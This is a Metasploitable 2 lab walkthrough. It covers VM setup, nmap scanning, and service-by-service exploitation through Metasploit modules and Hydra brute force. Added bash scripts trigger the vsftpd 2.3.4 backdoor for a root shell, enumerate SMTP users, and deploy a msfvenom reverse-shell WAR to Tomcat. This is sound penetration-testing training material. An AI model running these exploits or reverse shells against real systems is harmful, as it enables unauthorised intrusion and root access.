Metasploitable2
Metasploitable2 Complete Overview
Metasploitable is an intentionally vulnerable Linux virtual machine.
This VM can be used to conduct security training, test security tools, and practice common penetration testing techniques.
Installation and configuration
This walkthrough exploits Metasploitable 2, a deliberately vulnerable Linux VM built for penetration-testing practice.
Download the Metasploitable 2 image from https://information.rapid7.com/download-metasploitable-2017.html
Installation Process:
- Open VirtualBox and click "New" to create a new virtual machine
- Enter a name for the machine (Metasploitable2)
- Allocate memory (512 MB is enough; do not go below it)
- Select "Use an existing virtual hard disk file"
- Select the .vmdk file you downloaded from Rapid7
- Click Create. The VM is now registered; next, configure its network settings.
After installation, change the network adapter settings as follows:
Under Settings > Network > Adapter 1, attach the adapter to the interface your attacking machine uses (Ethernet or wireless). Because the machine is deliberately vulnerable, prefer a host-only or internal network shared with your Kali VM over bridging it onto a real LAN.
In the Advanced tab, set Promiscuous Mode to "Allow All" (only needed if you want to sniff traffic from other VMs on that network).
Boot the Metasploitable 2 machine and log in with the credentials shown on the login banner (msfadmin/msfadmin).
Find the machine's IP address with the following command in its terminal:
ifconfig
That completes the setup.
Walkthrough
Scanning
Scanning Metasploitable 2
In this walkthrough the target's IP address is 192.168.0.130.
Start with an Nmap scan from Kali Linux. -sV probes every open port for the service and its version, and -p- covers all 65535 TCP ports; that is slower than the default top-1000 scan, but Metasploitable 2 runs services on high ports such as 8180 and 8787 that the default scan misses.
nmap -sV -p- 192.168.0.130
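The same scan with its output turned into a port list, as an added example that is not part of the original walkthrough. It assumes bash, awk and nmap on the attacking machine and uses nmap's grepable output format (-oG); the sample output embedded in the script is constructed, not a real capture, so the parser can be tried without a target.

```bash
#!/usr/bin/env bash
# Added example: run the full-port version scan and turn nmap's grepable
# output (-oG) into a one-line-per-open-port list for the sections below.

# Parse nmap -oG output from stdin; print "port/proto service version" for
# every open port. Grepable port entries look like
#   21/open/tcp//ftp//vsftpd 2.3.4/
# i.e. port/state/proto/owner/service/rpc/version, comma-separated after "Ports: ".
parse_nmap_grepable() {
  awk -F'\t' '
    /^Host:.*Ports:/ {
      ports = ""
      for (i = 1; i <= NF; i++) if ($i ~ /^Ports: /) ports = substr($i, 8)
      n = split(ports, entry, ", ")
      for (j = 1; j <= n; j++) {
        split(entry[j], f, "/")
        if (f[2] == "open") printf "%s/%s %s %s\n", f[1], f[3], f[5], f[7]
      }
    }'
}

# Full TCP port range with version probes, streamed straight into the parser.
scan_host() {
  nmap -sV -p- -oG - "$1" | parse_nmap_grepable
}

# Constructed sample of -oG output (not a real capture) so the parser can be
# exercised without a target; the services mirror Metasploitable 2's well-known ones.
SAMPLE_GREPABLE="$(printf 'Host: 192.168.0.130 ()\tPorts: 21/open/tcp//ftp//vsftpd 2.3.4/, 22/open/tcp//ssh//OpenSSH 4.7p1 Debian 8ubuntu1 (protocol 2.0)/, 23/open/tcp//telnet//Linux telnetd/, 1524/open/tcp//bindshell//Metasploitable root shell/, 6667/open/tcp//irc//UnrealIRCd/\tIgnored State: closed (65530)')"

if [ $# -ge 1 ]; then
  scan_host "$1"                       # usage: ./scan.sh 192.168.0.130
else
  printf '%s\n' "$SAMPLE_GREPABLE" | parse_nmap_grepable
fi
```

Run it with the target IP to scan, or without arguments to see the parser applied to the constructed sample. Keeping the parsed list is worth it: every section below starts from a port number and a version string, and a full -p- scan of a VM takes long enough that you do not want to repeat it.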
Exploiting the open ports, one service at a time:
21-FTP
Method 1:
Log in with the username anonymous and no password (servers that allow anonymous FTP accept an empty or arbitrary password for that account).
More on anonymous FTP:
https://whatis.techtarget.com/definition/anonymous-FTP-File-Transfer-Protocol
ftp 192.168.0.130
Method 2:
Brute-force the login with Hydra; you need a username list and a password list.
hydra -L /root/Desktop/USERNAMES.txt -P /root/Desktop/PASSWORDS.txt <Target IP Address> ftp -V
Hydra tries every username/password pair from the two files against the target's FTP service (-V prints each attempt).
Once a pair works you can log in with the ftp client as above.
This only gives a user-level FTP login; getting root from there needs a separate privilege-escalation step.
Method 3:
Exploiting FTP through the Metasploit framework
Open the Metasploit console and search for the vsftpd backdoor exploit:
msfconsole
search vsftpd
use exploit/unix/ftp/vsftpd_234_backdoor
show options
set RHOSTS 192.168.0.130
exploit
The module triggers the backdoor compiled into the tampered vsftpd 2.3.4 release and returns a command shell running as root.
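The same backdoor triggered by hand, as an added example rather than code from the original walkthrough or from the Metasploit module. It assumes bash (for /dev/tcp) and netcat on the attacking machine; the banners it checks against are constructed strings in the format vsftpd prints.

```bash
#!/usr/bin/env bash
# Added example: fingerprint vsftpd 2.3.4 and trigger its backdoor by hand,
# which is what exploit/unix/ftp/vsftpd_234_backdoor automates.

# The tampered 2.3.4 release arms the backdoor when the USER value contains
# the two characters ":)"; the daemon then listens on TCP 6200 and hands a
# root /bin/sh to whoever connects. The greeting identifies the version.
vsftpd_banner_is_234() {
  case "$1" in
    *"vsFTPd 2.3.4"*) return 0 ;;
    *) return 1 ;;
  esac
}

# FTP commands that arm the backdoor. The credentials do not matter; only
# the smiley in the username does.
trigger_commands() {
  printf 'USER backdoor:)\r\nPASS anything\r\n'
}

# usage: vsftpd_backdoor <target-ip>
vsftpd_backdoor() {
  local host=$1 banner
  exec 3<>"/dev/tcp/$host/21" || return 1
  read -r banner <&3
  if ! vsftpd_banner_is_234 "$banner"; then
    printf 'not vsftpd 2.3.4, refusing to fire: %s\n' "$banner" >&2
    exec 3>&-
    return 1
  fi
  trigger_commands >&3
  sleep 2              # give the daemon a moment to open 6200
  exec 3>&-
  # Interactive root shell; "id" should print uid=0(root).
  nc -v "$host" 6200
}

if [ $# -ge 1 ]; then
  vsftpd_backdoor "$1"
fi
```

The version check is the useful part for a real engagement: firing the trigger against a server that is not 2.3.4 does nothing, and a 2.3.4 banner with no shell on 6200 usually means a patched or re-built package rather than the backdoored tarball.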
22-SSH
Secure Shell (SSH) is a cryptographic network protocol for operating network services securely over an unsecured network.
Exploiting SSH with different techniques
Method 1
Cracking the username and password with Hydra
Hydra ships with Kali Linux and performs online brute-force attacks: it tries every username/password combination from the supplied lists against the target service until one is accepted.
hydra -L <Usernames_List> -P <Passwords_List> <Target ip address> ssh
Method 2
Use the Metasploit ssh_login scanner
Open a terminal and run:
service postgresql start
msfconsole
search ssh_login
use auxiliary/scanner/ssh/ssh_login
show options
set RHOSTS <target IP Address> --> in my case 192.168.0.130
Point USER_FILE and PASS_FILE at your username and password lists:
set USER_FILE <Username file Path>
set PASS_FILE <Password file Path>
exploit
The module works through every combination in the lists (the run time grows with their size) and reports each valid username:password pair it finds; log in with one of them:
ssh username@targetipaddress
This is an unprivileged user shell; to get root you still need a privilege-escalation step.
23-TELNET
Telnet is a simple, text-based protocol for logging in to remote computers over TCP/IP. It dates from 1969, long before SSH, and sends everything, including the login credentials, in cleartext.
telnet <target IP Address> --> 192.168.0.130
The Metasploitable 2 banner is shown on connect and tells you to log in with msfadmin/msfadmin; enter those credentials and you are in.
25-SMTP
SMTP is the application-layer protocol that Mail Transfer Agents (MTAs) use to hand mail from server to server ("store and forward") until it reaches the server that holds the recipient's mailbox.
Method 1:
Using Metasploit
Start Metasploit and look up the smtp_version scanner:
service postgresql start
msfconsole -q
search smtp_version
use auxiliary/scanner/smtp/smtp_version (or: use 0, the first search result)
show options
set RHOSTS 192.168.0.130
exploit (or run)
SMTP stands for Simple Mail Transfer Protocol. The MTA behind port 25 knows which local users have mailboxes, and some of its commands will tell you whether a given name exists.
We connect to the target on port 25 with netcat and use those commands to enumerate users.
Open a new terminal and type:
nc 192.168.0.130 25
Once the 220 banner arrives the connection is up and you can issue SMTP commands by hand.
Type: VRFY <username>
VRFY is an SMTP command, not a shell: a 250 or 252 reply means the server recognises the user, a 550 reply means it does not.
For the full SMTP command set see: http://www.tcpipguide.com/free/t_SMTPCommands-2.htm
Method 2
Using smtp_enum
The same enumeration is automated by a Metasploit module:
search smtp_enum
use auxiliary/scanner/smtp/smtp_enum
show options
set RHOSTS 192.168.0.130
exploit
The module runs VRFY (and related commands) over a built-in wordlist to list the users known to the SMTP service.
The user names it recovers are good input for the SSH, FTP and Telnet brute-force lists above.
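The manual VRFY enumeration described above, scripted, as an added example that is not part of the original walkthrough and not the smtp_enum module's code. It assumes bash (for /dev/tcp) and an SMTP server that answers VRFY; the reply lines used to test the classifier are constructed in Postfix's format.

```bash
#!/usr/bin/env bash
# Added example: enumerate mailbox names with VRFY, by hand, the way
# auxiliary/scanner/smtp/smtp_enum does under the hood.

# Classify one reply to VRFY. 250 means the mailbox exists; 252 means the
# server will not confirm it but will try delivery, which Postfix uses for
# names it knows (treat as "probable"); 550/551/553 mean no such user.
classify_vrfy_reply() {
  case "$1" in
    250*)           echo valid ;;
    252*)           echo probable ;;
    550*|551*|553*) echo unknown ;;
    *)              echo other ;;   # e.g. 502 when VRFY is disabled
  esac
}

# usage: vrfy_enum <host> <port> <wordlist>
# Prints one line per candidate: "<name> <classification>".
# HELO rather than EHLO keeps every reply on a single line.
vrfy_enum() {
  local host=$1 port=${2:-25} wordlist=$3 reply name
  exec 3<>"/dev/tcp/$host/$port" || return 1
  read -r reply <&3                        # 220 banner
  printf 'HELO enum.local\r\n' >&3
  read -r reply <&3                        # 250 greeting
  while read -r name; do
    [ -n "$name" ] || continue
    printf 'VRFY %s\r\n' "$name" >&3
    read -r reply <&3
    printf '%s %s\n' "$name" "$(classify_vrfy_reply "$reply")"
  done < "$wordlist"
  printf 'QUIT\r\n' >&3
  exec 3>&-
}

# Keep only the hits; usable directly as a USER_FILE for the SSH/FTP brute force above.
only_hits() {
  awk '$2 == "valid" || $2 == "probable" { print $1 }'
}

if [ $# -ge 3 ]; then
  vrfy_enum "$1" "$2" "$3" | only_hits    # usage: ./vrfy.sh 192.168.0.130 25 users.txt
fi
```

A 252 is deliberately reported as "probable" rather than "valid": RFC 5321 lets a server answer 252 without checking anything, so on an unfamiliar MTA confirm a hit with RCPT TO before spending brute-force time on it. If every name comes back "other", VRFY is disabled and you need the RCPT TO route instead.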
139 & 445 NetBIOS-SSN (Samba)
Samba is an open-source project that is widely used on Linux and Unix computers so they can work with Windows file and print services.
It can even act as a domain controller, handling login, authentication and access control for a Windows network.
Search for the exploit by name (usermap_script) and select it:
use exploit/multi/samba/usermap_script
View the options for the exploit:
show options
set RHOSTS 192.168.0.130 (target IP address)
Set the payload:
show payloads
set payload cmd/unix/reverse
Set the arguments the payload needs:
show options
set LHOST 192.168.0.109 (attacker's IP address)
set LPORT 4444
Check that every required argument is filled, then:
exploit
The module abuses Samba's "username map script" option: a username containing shell metacharacters is passed to /bin/sh, so the reverse shell comes back with smbd's privileges, which is root.
1099–Java-RMI
Remote Method Invocation (RMI) is an API that allows an object to invoke a method on an object that exists in another address space, which could be on the same machine or a remote machine.
Exploiting java-RMI-server
Search for the exploit:
search java_rmi_server
Pick the module by rank: an "excellent" ranked module is more reliable than a "normal" one.
use exploit/multi/misc/java_rmi_server
show options
set RHOSTS <target's IP>
exploit
The module abuses the RMI registry's default willingness to load classes from a remote URL and gives a shell on the target.
1524-BINDSHELL
A bind shell is a shell that the target itself exposes: it opens a listening port and waits for a connection, and whoever connects gets command execution on that machine (in a reverse shell, by contrast, the target connects back to the attacker).
Exploitation
Metasploitable 2 runs an unauthenticated root shell on this port, so netcat is all you need:
nc <target ip address> 1524
You now have a root shell.
2121-ProFTPD
You need valid credentials for this port; the brute-force methods above will find them. Metasploitable 2 accepts user/user, and because FTP is a plain-text protocol you can drive ProFTPD from telnet:
telnet <Target IP Address> <Port Number>
USER <username>
PASS <password>
This is an ordinary user account; getting root needs a separate privilege-escalation step.
3306-MYSQL
Method 1:
Search for the login scanner:
search mysql_login
use auxiliary/scanner/mysql/mysql_login
MySQL is sometimes left with an empty root password, and the scanner can test for that directly. Set RHOSTS to the target as with the other modules and enable blank-password checks.
Note: BLANK_PASSWORDS is false by default, so switch it on:
set BLANK_PASSWORDS true
Method 2:
Connect directly with the mysql client as root; if it lets you in without prompting for a password, the root account has none:
mysql -u root -h <target's IP>
3632-DISTCCD
distcc speeds up compilation by farming compile jobs out to other machines on the network; with the right configuration it can cut a project's build time dramatically.
Exploiting port 3632 with distcc_exec
Open msfconsole and search for distcc_exec:
search distcc_exec
(select the module the search returns with use)
show options
Set the required arguments and run the exploit:
set RHOSTS <target-ip>
exploit
This gives an unprivileged shell as the distccd service account; root needs a separate privilege escalation.
5432-Postgresql
Exploiting PostgreSQL with postgres_payload
Open msfconsole and search for postgres_payload:
search postgres_payload
use exploit/linux/postgres/postgres_payload
show options
Set the required arguments for the exploit:
set RHOSTS <target-ip>
The module defaults to the username postgres (and the password postgres), which Metasploitable 2 accepts.
exploit
Once logged in, the module uploads a payload through the database and executes it, returning a session as the postgres OS user.
From there, privilege escalation is the next step.
5900-VNC
Open msfconsole and search for vnc_login:
search vnc_login
use auxiliary/scanner/vnc/vnc_login
show options
set RHOSTS <targets IP>
set PASS_FILE <filepath that contains passwords>
run (or exploit)
vnc_login brute-forces the VNC password; classic VNC authentication has no username, so only a password list is needed. It works against VNC servers on Linux, Unix or Windows.
Connect with a VNC viewer using the recovered password:
Start a VNC viewer from the terminal and enter the target's IP address.
A login prompt asks for the password.
Enter it and click OK.
You now have a desktop session on the target.
6000-X11
The X Window System (aka X) is a windowing system for bitmap displays, which is common on UNIX-based operating systems. X provides the basic framework for a GUI based environment.
On Metasploitable 2 the X server on port 6000 accepts connections from any host. The X server owns the graphics hardware, input devices and display, so anyone who can reach it can interact with that display.
Reaching the display over SSH
ssh -X -l msfadmin 192.168.0.130
-X turns on X11 forwarding for the SSH session (it does not forward "all ports"): graphical programs you start in the resulting shell are displayed on your own machine. This route still needs the msfadmin credentials; it is a way to use the remote display, not an exploit of port 6000 itself.
6667 & 6697 UnrealIRCD
UnrealIRCd is an open-source IRC server in use since 1999; it runs on Linux, OS X and Windows, is highly modular and configurable, supports SSL, and is one of the most widely deployed IRC daemons.
Protocol: Internet Relay Chat (IRC)
Let’s Exploit this IRC Server.
Method 1: on port 6667
search unrealircd
use exploit/unix/irc/unreal_ircd_3281_backdoor
show options
Set the required arguments for the exploit:
set RHOSTS <target-ip>
RPORT defaults to 6667.
run (or exploit)
The backdoor planted in the 3.2.8.1 release hands back a shell running as the IRC daemon's user; on Metasploitable 2 that is root.
Method 2: On port 6697
Use the same exploit and arguments, but point RPORT at 6697, where the same daemon also listens:
set RHOSTS <target-ip>
set RPORT 6697
exploit
This gives root a second time.
8180-TOMCAT
Apache Tomcat is an open-source implementation of the Java Servlet, JavaServer Pages, Java Expression Language, and WebSocket technologies. Tomcat provides a “pure Java” HTTP web server environment in which Java code can run.
Exploiting Apache Tomcat
This takes two steps: recover the manager credentials, then use them to deploy a payload.
Open msfconsole and search for tomcat_mgr_login, then select the scanner it returns with use:
search tomcat_mgr_login
set RHOSTS <target-ip>
show options
The module ships with default username and password lists. Set RPORT to 8180 as well, because Metasploitable 2 runs Tomcat there rather than on the module's default 8080, then type exploit (or run):
run
Note the username:password pair it reports and feed it to the next module.
Search for the Tomcat manager upload exploit:
search tomcat_mgr_upload
use exploit/multi/http/tomcat_mgr_upload
show options
Set RHOSTS, RPORT (8180), HttpUsername and HttpPassword to the values from the login module, then run the exploit.
msfconsole picks a suitable default payload for the exploit, which is why the session comes back as Meterpreter.
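The upload step done by hand, as an added example that is not part of the original walkthrough or of the Metasploit module. It assumes msfvenom, curl and netcat on the attacking machine, manager credentials already recovered by tomcat_mgr_login, and the pre-Tomcat-7 manager path (Metasploitable 2's Tomcat predates 7; on 7 and later the same commands live under /manager/text/). The manager "list" output used to test the parser is constructed in the format Tomcat prints.

```bash
#!/usr/bin/env bash
# Added example: do the tomcat_mgr_upload step by hand with msfvenom and curl
# against the Tomcat manager on Metasploitable 2's port 8180.

# Parse the manager "list" response (one "path:state:sessions:docbase" line per
# application after the "OK - ..." header) into "path state sessions docbase".
parse_manager_list() {
  awk -F: 'NR > 1 && NF >= 4 { printf "%s %s %s %s\n", $1, $2, $3, $4 }'
}

# usage: app_running <context-path> < list-output ; exit 0 if it is running.
app_running() {
  parse_manager_list | awk -v p="$1" '$1 == p && $2 == "running" { found = 1 } END { exit found ? 0 : 1 }'
}

# usage: deploy_shell <host> <port> <user> <pass> <attacker-ip> <attacker-port>
# Builds a JSP reverse-shell WAR, deploys it under /shell and confirms it is running.
deploy_shell() {
  local host=$1 port=$2 user=$3 pass=$4 lhost=$5 lport=$6
  local base="http://$host:$port/manager"   # Tomcat 5/6 path; Tomcat 7+ uses /manager/text
  msfvenom -p java/jsp_shell_reverse_tcp LHOST="$lhost" LPORT="$lport" -f war -o shell.war
  # Same credentials the login scanner recovered; the manager uses HTTP basic auth.
  curl -s -u "$user:$pass" -T shell.war "$base/deploy?path=/shell"
  if curl -s -u "$user:$pass" "$base/list" | app_running /shell; then
    echo "deployed; start 'nc -lvnp $lport', then request http://$host:$port/shell/ to get the shell"
  else
    echo "deploy failed; check the manager's reply above" >&2
    return 1
  fi
}

if [ $# -ge 6 ]; then
  deploy_shell "$@"
fi
```

Requesting the context root relies on the WAR's web.xml listing the generated JSP as a welcome file; if that does not trigger the callback, list the archive with unzip -l shell.war and request the JSP by name. Undeploy with the manager's undeploy?path=/shell command when you are done, since the dropped WAR is a working backdoor for anyone else on the network.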
8787-Ruby-drb
dRuby is a distributed object system for Ruby, written in pure Ruby and using its own wire protocol.
It needs nothing beyond what the Ruby runtime already provides, such as TCP sockets.
search drb_remote_codeexec
(select the module the search returns with use)
Set the required arguments and run the exploit:
show options
set RHOSTS <target-ip>
exploit (or run)
The dRuby service accepts method calls from any client, including ones that execute code, and on Metasploitable 2 it runs as root, so the session is a root shell; run a few commands to confirm.